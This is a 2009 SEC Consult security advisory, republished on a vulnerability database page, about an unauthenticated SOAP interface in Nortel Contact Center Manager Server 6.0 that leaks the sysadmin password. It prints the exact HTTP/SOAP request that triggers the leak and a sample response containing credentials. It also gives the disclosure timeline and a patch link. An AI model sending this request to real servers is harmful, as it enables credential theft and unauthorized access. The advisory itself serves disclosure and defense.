Lucene search
K

Nortel Contact Center Manager Password Disclosure

🗓️ 27 May 2009 00:00:00Reported by D. MatschekoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 47 Views

Nortel Contact Center Manager Server Password Disclosur

Code
`SEC Consult Security Advisory < 20090525-1 >  
==========================================================================  
title: Nortel Contact Center Manager Server Password   
Disclosure  
program: Nortel Contact Center Manager Server  
vulnerable version: 6.0  
homepage: http://www.nortel.com/ccms  
found: 2008-11-14  
by: David Matscheko / SEC Consult Vulnerability Lab  
permanent link: https://www.sec-consult.com/advisories_e.html#a57  
==========================================================================  
  
Vendor description:  
-------------------  
  
Contact Center Manager Server (CCMS) offers a scalable solution for  
dynamic contact center environments requiring sophistication and  
differentiation in the care offered to their customers. CCMS provides  
skill-based routing; call treatment flexibility, real time displays,  
multimedia routing, and comprehensive management and reporting  
functionality - empowering contact center managers with the tools and  
agility to deliver unique and unprecedented care to their customers. The  
rich scripting language supports multifaceted call routing and treatment  
decisions based on combinations of real time conditions.   
  
[source: http://www.nortel.com/ccms]  
  
  
Vulnerability overview:  
-----------------------  
  
The Nortel Contact Center Manager Server web application provides a SOAP  
interface. This interface does not need authorisation and responds to  
certain requests with sensitive information.  
  
  
Vulnerability description:  
--------------------------  
  
The following SOAP request queries the user data for the user  
"sysadmin":  
  
---  
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx  
HTTP/1.1  
Host: 10.1.2.3  
Content-Type: text/xml; charset=utf-8  
SOAPAction:  
"http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"  
Content-Length: 661  
  
<?xml version="1.0" encoding="utf-8"?>  
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  
<soap:Body>  
<SOAPWrapperCommon_UsersWS_GetServers_Wrapper  
xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">  
<ccmaUserName>string</ccmaUserName>  
<clientIP>string</clientIP>  
<componentID>string</componentID>  
<sessionID>string</sessionID>  
<strUserID>string</strUserID>  
<strPassword>string</strPassword>  
</SOAPWrapperCommon_UsersWS_GetServers_Wrapper>  
</soap:Body>  
</soap:Envelope>  
---  
  
The following is an excerpt of the response to the previous query. It  
contains the user sysadmin with the corresponding password (password,  
server IP address, and server name has been changed):  
  
---  
<rs:data>  
<z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3'  
ServerDescription='abcd01' ServerUserID='sysadmin'  
ServerPassword='pwd4hugo'  
ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0'  
Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05'  
ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3'  
RefreshIntervalsElapsed='0'/>  
</rs:data>  
---  
  
  
Proof of concept:  
-----------------  
  
This vulnerability can be exploited with a web browser and plugins / web  
proxy.  
  
  
Vulnerable versions:  
--------------------  
  
The version tested was 06.00.004.03 with the following updates applied:  
  
CCMA_6.0_SU_05  
CCMA_6.0_SUS_0501  
CCMA_6.0_SUS_0502  
  
Prior versions are most likely also vulnerable.  
  
  
Vendor contact timeline:  
------------------------  
  
January 2009: Vendor informed about vulnerability  
2009-05-14: Patch available  
2009-05-25: Public Release  
  
  
Patch:  
------  
  
The vendor has released a vulnerability fix which addresses the issue.  
In addition, the vendor has released a public security advisory  
containing update instructions. URL:  
  
http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905808  
  
  
--  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
EOF David Matscheko / @2009  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation